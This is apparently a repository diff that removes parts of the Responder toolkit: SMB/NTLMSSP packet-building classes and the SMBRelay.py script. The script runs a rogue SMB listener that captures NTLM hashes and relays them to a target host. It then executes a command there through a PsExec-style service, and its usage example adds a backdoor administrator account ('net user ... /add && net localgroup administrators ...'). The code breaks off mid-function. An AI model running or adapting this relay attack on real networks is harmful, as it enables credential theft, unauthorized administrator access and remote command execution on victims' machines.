AsnLen= str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
|
|
||||||
|
|
||||||
CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
|
|
||||||
|
|
||||||
##### Bcc len
|
|
||||||
BccLen = AsnLen+CalculateSecBlob+str(self.fields["NTLMSSPNTLMPadding"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLAN"])+str(self.fields["NativeLANTerminator"])
|
|
||||||
#SecBlobLen
|
|
||||||
self.fields["SecBlobLen"] = struct.pack("<h", len(AsnLen+CalculateSecBlob))
|
|
||||||
self.fields["Bcc"] = struct.pack("<h", len(BccLen))
|
|
||||||
self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3)
|
|
||||||
self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-6)
|
|
||||||
self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
|
|
||||||
self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"])))
|
|
||||||
self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])))
|
|
||||||
self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob))
|
|
||||||
|
|
||||||
###### Andxoffset calculation.
|
|
||||||
CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Action"])+str(self.fields["SecBlobLen"])+str(self.fields["Bcc"])+BccLen
|
|
||||||
|
|
||||||
self.fields["Andxoffset"] = struct.pack("<h", len(CalculateCompletePacket)+32)
|
|
||||||
###### Workstation Offset
|
|
||||||
CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
|
||||||
|
|
||||||
###### AvPairs Offset
|
|
||||||
CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
|
|
||||||
|
|
||||||
##### Workstation Offset Calculation:
|
|
||||||
self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
|
|
||||||
self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
||||||
self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
||||||
|
|
||||||
##### IvPairs Offset Calculation:
|
|
||||||
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
||||||
self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
|
|
||||||
self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
|
|
||||||
##### IvPair Calculation:
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
|
|
||||||
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
|
|
||||||
|
|
||||||
##################################################################################
|
|
||||||
|
|
||||||
class SMBSession2Accept(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Wordcount", "\x04"),
|
|
||||||
("AndXCommand", "\xff"),
|
|
||||||
("Reserved", "\x00"),
|
|
||||||
("Andxoffset", "\xb4\x00"),
|
|
||||||
("Action", "\x00\x00"),
|
|
||||||
("SecBlobLen", "\x09\x00"),
|
|
||||||
("Bcc", "\x89\x01"),
|
|
||||||
("SSPIAccept","\xa1\x07\x30\x05\xa0\x03\x0a\x01\x00"),
|
|
||||||
("NativeOs","Windows Server 2003 3790 Service Pack 2"),
|
|
||||||
("NativeOsTerminator","\x00\x00"),
|
|
||||||
("NativeLAN", "Windows Server 2003 5.2"),
|
|
||||||
("NativeLANTerminator","\x00\x00"),
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
|
|
||||||
self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le')
|
|
||||||
BccLen = str(self.fields["SSPIAccept"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLAN"])+str(self.fields["NativeLANTerminator"])
|
|
||||||
self.fields["Bcc"] = struct.pack("<h", len(BccLen))
|
|
||||||
|
|
||||||
class SMBSessEmpty(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Empty", "\x00\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
class SMBTreeData(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Wordcount", "\x07"),
|
|
||||||
("AndXCommand", "\xff"),
|
|
||||||
("Reserved","\x00" ),
|
|
||||||
("Andxoffset", "\xbd\x00"),
|
|
||||||
("OptionalSupport","\x00\x00"),
|
|
||||||
("MaxShareAccessRight","\x00\x00\x00\x00"),
|
|
||||||
("GuestShareAccessRight","\x00\x00\x00\x00"),
|
|
||||||
("Bcc", "\x94\x00"),
|
|
||||||
("Service", "IPC"),
|
|
||||||
("ServiceTerminator","\x00\x00\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
#Complete Packet Len
|
|
||||||
CompletePacket= str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["OptionalSupport"])+str(self.fields["MaxShareAccessRight"])+str(self.fields["GuestShareAccessRight"])+str(self.fields["Bcc"])+str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
|
|
||||||
## AndXOffset
|
|
||||||
self.fields["Andxoffset"] = struct.pack("<H", len(CompletePacket)+32)
|
|
||||||
## BCC Len Calc
|
|
||||||
BccLen= str(self.fields["Service"])+str(self.fields["ServiceTerminator"])
|
|
||||||
self.fields["Bcc"] = struct.pack("<H", len(BccLen))
|
|
||||||
|
|
||||||
# SMB Session/Tree Answer.
|
|
||||||
class SMBSessTreeAns(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Wordcount", "\x03"),
|
|
||||||
("Command", "\x75"),
|
|
||||||
("Reserved", "\x00"),
|
|
||||||
("AndXoffset", "\x4e\x00"),
|
|
||||||
("Action", "\x01\x00"),
|
|
||||||
("Bcc", "\x25\x00"),
|
|
||||||
("NativeOs", "Windows 5.1"),
|
|
||||||
("NativeOsNull", "\x00"),
|
|
||||||
("NativeLan", "Windows 2000 LAN Manager"),
|
|
||||||
("NativeLanNull", "\x00"),
|
|
||||||
("WordcountTree", "\x03"),
|
|
||||||
("AndXCommand", "\xff"),
|
|
||||||
("Reserved1", "\x00"),
|
|
||||||
("AndxOffset", "\x00\x00"),
|
|
||||||
("OptionalSupport", "\x01\x00"),
|
|
||||||
("Bcc2", "\x08\x00"),
|
|
||||||
("Service", "A:"),
|
|
||||||
("ServiceNull", "\x00"),
|
|
||||||
("FileSystem", "NTFS"),
|
|
||||||
("FileSystemNull", "\x00"),
|
|
||||||
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
##AndxOffset
|
|
||||||
CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["Command"])+str(self.fields["Reserved"])+str(self.fields["AndXoffset"])+str(self.fields["Action"])+str(self.fields["Bcc"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
|
|
||||||
self.fields["AndXoffset"] = struct.pack("<i", len(CalculateCompletePacket)+32)[:2]
|
|
||||||
##BCC 1 and 2
|
|
||||||
CompleteBCCLen = str(self.fields["NativeOs"])+str(self.fields["NativeOsNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanNull"])
|
|
||||||
self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen))
|
|
||||||
CompleteBCC2Len = str(self.fields["Service"])+str(self.fields["ServiceNull"])+str(self.fields["FileSystem"])+str(self.fields["FileSystemNull"])
|
|
||||||
self.fields["Bcc2"] = struct.pack("<h",len(CompleteBCC2Len))
|
|
||||||
448
SMBRelay.py
448
SMBRelay.py
@@ -1,448 +0,0 @@
|
|||||||
# NBT-NS/LLMNR Responder
|
|
||||||
# Created by Laurent Gaffie
|
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
|
||||||
#
|
|
||||||
# This program is free software: you can redistribute it and/or modify
|
|
||||||
# it under the terms of the GNU General Public License as published by
|
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
|
||||||
# (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful,
|
|
||||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
# GNU General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
import sys, os, struct,re,socket,random, RelayPackets,optparse,thread
|
|
||||||
from FingerprintRelay import RunSmbFinger
|
|
||||||
from odict import OrderedDict
|
|
||||||
from socket import *
|
|
||||||
from RelayPackets import *
|
|
||||||
|
|
||||||
def UserCallBack(op, value, dmy, parser):
|
|
||||||
args=[]
|
|
||||||
for arg in parser.rargs:
|
|
||||||
if arg[0] != "-":
|
|
||||||
args.append(arg)
|
|
||||||
if getattr(parser.values, op.dest):
|
|
||||||
args.extend(getattr(parser.values, op.dest))
|
|
||||||
setattr(parser.values, op.dest, args)
|
|
||||||
|
|
||||||
parser = optparse.OptionParser(usage="python %prog -i 10.20.30.40 -c 'net user Responder Quol0eeP/e}X /add &&net localgroup administrators Responder /add' -t 10.20.30.45 -u Administrator lgandx admin",
|
|
||||||
prog=sys.argv[0],
|
|
||||||
)
|
|
||||||
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
|
|
||||||
|
|
||||||
parser.add_option('-c',action='store', help='Command to run on the target.',metavar='"net user Responder Quol0eeP/e}X /ADD"',dest='CMD')
|
|
||||||
|
|
||||||
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
|
|
||||||
|
|
||||||
parser.add_option('-d',action="store", help="Target Domain for SMB relay (optional). This can be set to overwrite a domain logon (DOMAIN\Username) with the gathered credentials. Woks on NTLMv1",metavar="WORKGROUP",dest="Domain")
|
|
||||||
|
|
||||||
parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
|
|
||||||
|
|
||||||
options, args = parser.parse_args()
|
|
||||||
|
|
||||||
if options.CMD is None:
|
|
||||||
print "\n-c mandatory option is missing, please provide a command to execute on the target.\n"
|
|
||||||
parser.print_help()
|
|
||||||
exit(-1)
|
|
||||||
|
|
||||||
if options.TARGET is None:
|
|
||||||
print "\n-t mandatory option is missing, please provide a target.\n"
|
|
||||||
parser.print_help()
|
|
||||||
exit(-1)
|
|
||||||
|
|
||||||
if options.UserToRelay is None:
|
|
||||||
print "\n-u mandatory option is missing, please provide a username to relay.\n"
|
|
||||||
parser.print_help()
|
|
||||||
exit(-1)
|
|
||||||
|
|
||||||
ResponderPATH = os.path.dirname(__file__)
|
|
||||||
# Set some vars.
|
|
||||||
UserToRelay = options.UserToRelay
|
|
||||||
Domain = options.Domain
|
|
||||||
Command = options.CMD
|
|
||||||
Target = options.TARGET
|
|
||||||
OURIP = options.OURIP
|
|
||||||
|
|
||||||
print "\nResponder SMBRelay 0.1\nPlease send bugs/comments to: lgaffie@trustwave.com"
|
|
||||||
print '\033[31m'+'Use this script in combination with Responder.py for best results (remember to set SMB = Off in Responder.conf)..\nUsernames to relay (-u) are case sensitive.'+'\033[0m'
|
|
||||||
print 'To kill this script hit CRTL-C or Enter\nWill relay credentials for these users: '+'\033[1m\033[34m'+', '.join(UserToRelay)+'\033[0m\n'
|
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
#Logger
|
|
||||||
import logging
|
|
||||||
Logs = logging
|
|
||||||
Logs.basicConfig(filemode="w",filename='SMBRelay-Session.txt',format='',level=logging.DEBUG)
|
|
||||||
|
|
||||||
#Function used to verify if a previous auth attempt was made.
|
|
||||||
def ReadData(outfile,Client, User, cmd=None):
|
|
||||||
try:
|
|
||||||
with open(ResponderPATH+outfile,"r") as filestr:
|
|
||||||
if cmd == None:
|
|
||||||
String = Client+':'+User
|
|
||||||
if re.search(String.encode('hex'), filestr.read().encode('hex')):
|
|
||||||
filestr.close()
|
|
||||||
return True
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
if cmd != None:
|
|
||||||
String = Client+","+User+","+cmd
|
|
||||||
if re.search(String.encode('hex'), filestr.read().encode('hex')):
|
|
||||||
filestr.close()
|
|
||||||
print "[+] Command: %s was previously executed on host: %s. Won't execute again.\n" %(cmd, Client)
|
|
||||||
return True
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
|
|
||||||
except:
|
|
||||||
raise
|
|
||||||
|
|
||||||
#Function used to parse SMB NTLMv1/v2
|
|
||||||
def ParseHash(data,Client, Target):
|
|
||||||
try:
|
|
||||||
lenght = struct.unpack('<H',data[43:45])[0]
|
|
||||||
LMhashLen = struct.unpack('<H',data[51:53])[0]
|
|
||||||
NthashLen = struct.unpack('<H',data[53:55])[0]
|
|
||||||
Bcc = struct.unpack('<H',data[63:65])[0]
|
|
||||||
if NthashLen >= 30:
|
|
||||||
Hash = data[65+LMhashLen:65+LMhashLen+NthashLen]
|
|
||||||
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
|
|
||||||
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
|
|
||||||
Username, Domain = tuple(var)
|
|
||||||
if ReadData("SMBRelay-Session.txt", Client, Username):
|
|
||||||
print "[+]Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
|
|
||||||
pass
|
|
||||||
if Username in UserToRelay:
|
|
||||||
print '%s sent a NTLMv2 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
|
|
||||||
print "Username : ",Username
|
|
||||||
print "Domain (if joined, if not then computer name) : ",Domain
|
|
||||||
return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
|
|
||||||
if NthashLen == 24:
|
|
||||||
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
|
|
||||||
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
|
|
||||||
Username, Domain = tuple(var)
|
|
||||||
if ReadData("SMBRelay-Session.txt", Client, Username):
|
|
||||||
print "Auth from user %s with host %s previously failed. Won't relay."%(Username, Client)
|
|
||||||
pass
|
|
||||||
if Username in UserToRelay:
|
|
||||||
print '%s sent a NTLMv1 Response..\nVictim OS is : %s. Passing credentials to: %s'%(Client,RunSmbFinger((Client, 445)),Target)
|
|
||||||
LMHashing = data[65:65+LMhashLen].encode('hex').upper()
|
|
||||||
NTHashing = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
|
|
||||||
print "Username : ",Username
|
|
||||||
print "Domain (if joined, if not then computer name) : ",Domain
|
|
||||||
return data[65:65+LMhashLen],data[65+LMhashLen:65+LMhashLen+NthashLen],Username,Domain, Client
|
|
||||||
else:
|
|
||||||
print "'%s' user was not specified in -u option, won't relay authentication. Allowed users to relay are: %s"%(Username,UserToRelay)
|
|
||||||
pass
|
|
||||||
|
|
||||||
|
|
||||||
except Exception:
|
|
||||||
raise
|
|
||||||
|
|
||||||
#Detect if SMB auth was Anonymous
|
|
||||||
def Is_Anonymous(data):
|
|
||||||
LMhashLen = struct.unpack('<H',data[51:53])[0]
|
|
||||||
if LMhashLen == 0 or LMhashLen == 1:
|
|
||||||
print "SMB Anonymous login requested, trying to force client to auth with credz."
|
|
||||||
return True
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
|
|
||||||
def ParseDomain(data):
|
|
||||||
Domain = ''.join(data[81:].split('\x00\x00\x00')[:1])+'\x00\x00\x00'
|
|
||||||
return Domain
|
|
||||||
|
|
||||||
#Function used to know which dialect number to return for NT LM 0.12
|
|
||||||
def Parse_Nego_Dialect(data):
|
|
||||||
DialectStart = data[40:]
|
|
||||||
pack = tuple(DialectStart.split('\x02'))[:10]
|
|
||||||
var = [e.replace('\x00','') for e in DialectStart.split('\x02')[:10]]
|
|
||||||
test = tuple(var)
|
|
||||||
if test[0] == "NT LM 0.12":
|
|
||||||
return "\x00\x00"
|
|
||||||
if test[1] == "NT LM 0.12":
|
|
||||||
return "\x01\x00"
|
|
||||||
if test[2] == "NT LM 0.12":
|
|
||||||
return "\x02\x00"
|
|
||||||
if test[3] == "NT LM 0.12":
|
|
||||||
return "\x03\x00"
|
|
||||||
if test[4] == "NT LM 0.12":
|
|
||||||
return "\x04\x00"
|
|
||||||
if test[5] == "NT LM 0.12":
|
|
||||||
return "\x05\x00"
|
|
||||||
if test[6] == "NT LM 0.12":
|
|
||||||
return "\x06\x00"
|
|
||||||
if test[7] == "NT LM 0.12":
|
|
||||||
return "\x07\x00"
|
|
||||||
if test[8] == "NT LM 0.12":
|
|
||||||
return "\x08\x00"
|
|
||||||
if test[9] == "NT LM 0.12":
|
|
||||||
return "\x09\x00"
|
|
||||||
if test[10] == "NT LM 0.12":
|
|
||||||
return "\x0a\x00"
|
|
||||||
|
|
||||||
def SmbRogueSrv139(key,Target,DomainMachineName):
|
|
||||||
s = socket(AF_INET,SOCK_STREAM)
|
|
||||||
s.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
|
|
||||||
s.settimeout(30)
|
|
||||||
try:
|
|
||||||
s.bind(('0.0.0.0', 139))
|
|
||||||
s.listen(0)
|
|
||||||
conn, addr = s.accept()
|
|
||||||
except error, msg:
|
|
||||||
if "Address already in use" in msg:
|
|
||||||
print '\033[31m'+'Something is already listening on TCP 139, did you set SMB = Off in Responder.conf..?\nSMB Relay will not work.'+'\033[0m'
|
|
||||||
|
|
||||||
try:
|
|
||||||
while True:
|
|
||||||
data = conn.recv(1024)
|
|
||||||
##session request 139
|
|
||||||
if data[0] == "\x81":
|
|
||||||
buffer0 = "\x82\x00\x00\x00"
|
|
||||||
conn.send(buffer0)
|
|
||||||
##Negotiate proto answer.
|
|
||||||
if data[8:10] == "\x72\x00":
|
|
||||||
head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc8",pid=pidcalc(data),tid=tidcalc(data))
|
|
||||||
t = SMBNegoAns(Dialect=Parse_Nego_Dialect(data),Key=key,Domain=DomainMachineName)
|
|
||||||
t.calculate()
|
|
||||||
packet1 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet1)+packet1
|
|
||||||
conn.send(buffer1)
|
|
||||||
##Session Setup AndX Request
|
|
||||||
if data[8:10] == "\x73\x00":
|
|
||||||
if Is_Anonymous(data):
|
|
||||||
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
|
||||||
packet1 = str(head)+str(SMBSessEmpty())
|
|
||||||
buffer1 = longueur(packet1)+packet1
|
|
||||||
conn.send(buffer1)
|
|
||||||
else:
|
|
||||||
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x03\xc8",errorcode="\x6d\x00\x00\xC0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
|
|
||||||
packet1 = str(head)+str(SMBSessEmpty())#Return login fail anyways.
|
|
||||||
buffer1 = longueur(packet1)+packet1
|
|
||||||
conn.send(buffer1)
|
|
||||||
Credz = ParseHash(data,addr[0],Target)
|
|
||||||
return Credz
|
|
||||||
except:
|
|
||||||
return None
|
|
||||||
|
|
||||||
def RunRelay(host, Command,Domain):
|
|
||||||
Target = host
|
|
||||||
CMD = Command
|
|
||||||
print "Target is running: ", RunSmbFinger((host, 445))
|
|
||||||
s = socket(AF_INET, SOCK_STREAM)
|
|
||||||
s.connect((host, 445))
|
|
||||||
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x03\xc7",pid="\xff\xfe", tid="\xff\xff")
|
|
||||||
n = SMBNego(Data = SMBNegoData())
|
|
||||||
n.calculate()
|
|
||||||
packet0 = str(h)+str(n)
|
|
||||||
buffer0 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer0)
|
|
||||||
data = s.recv(2048)
|
|
||||||
Key = ParseAnswerKey(data,host)
|
|
||||||
DomainMachineName = ParseDomain(data)
|
|
||||||
if data[8:10] == "\x72\x00":
|
|
||||||
try:
|
|
||||||
a = SmbRogueSrv139(Key,Target,DomainMachineName)
|
|
||||||
if a is not None:
|
|
||||||
LMHash,NTHash,Username,OriginalDomain, CLIENTIP = a
|
|
||||||
if Domain == None:
|
|
||||||
Domain = OriginalDomain
|
|
||||||
if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
|
|
||||||
pass
|
|
||||||
else:
|
|
||||||
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x03\xc8",pid="\xff\xfe",mid="\x01\x00")
|
|
||||||
t = SMBSessionTreeData(AnsiPasswd=LMHash,UnicodePasswd=NTHash,Username=Username,Domain=Domain,Targ=Target)
|
|
||||||
t.calculate()
|
|
||||||
packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
except:
|
|
||||||
raise
|
|
||||||
a = None
|
|
||||||
if data[8:10] == "\x73\x6d":
|
|
||||||
print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
|
|
||||||
Logs.info(CLIENTIP+":"+Username)
|
|
||||||
if data[8:10] == "\x73\x0d":
|
|
||||||
print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
|
|
||||||
Logs.info(CLIENTIP+":"+Username)
|
|
||||||
## NtCreateAndx
|
|
||||||
if data[8:10] == "\x73\x00":
|
|
||||||
print "[+] Authenticated, trying to PSexec on target !"
|
|
||||||
head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x03\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
|
||||||
t = SMBNTCreateData()
|
|
||||||
t.calculate()
|
|
||||||
packet0 = str(head)+str(t)
|
|
||||||
buffer1 = longueur(packet0)+packet0
|
|
||||||
s.send(buffer1)
|
|
||||||
data = s.recv(2048)
|
|
||||||
## Fail Handling.
|
|
||||||
if data[8:10] == "\xa2\x22":
|
|
||||||
print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
|
|
||||||
## DCE/RPC Write.
|
|
||||||
if data[8:10] == "\xa2\x00":
|
|
||||||
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
|
|
||||||
x = SMBDCEData()
|
|
||||||
x.calculate()
|
|
||||||
f = data[42:44]
|
|
||||||
t = SMBWriteData(FID=f,Data=x)
|
|
||||||
t.calculate()
|
|
||||||
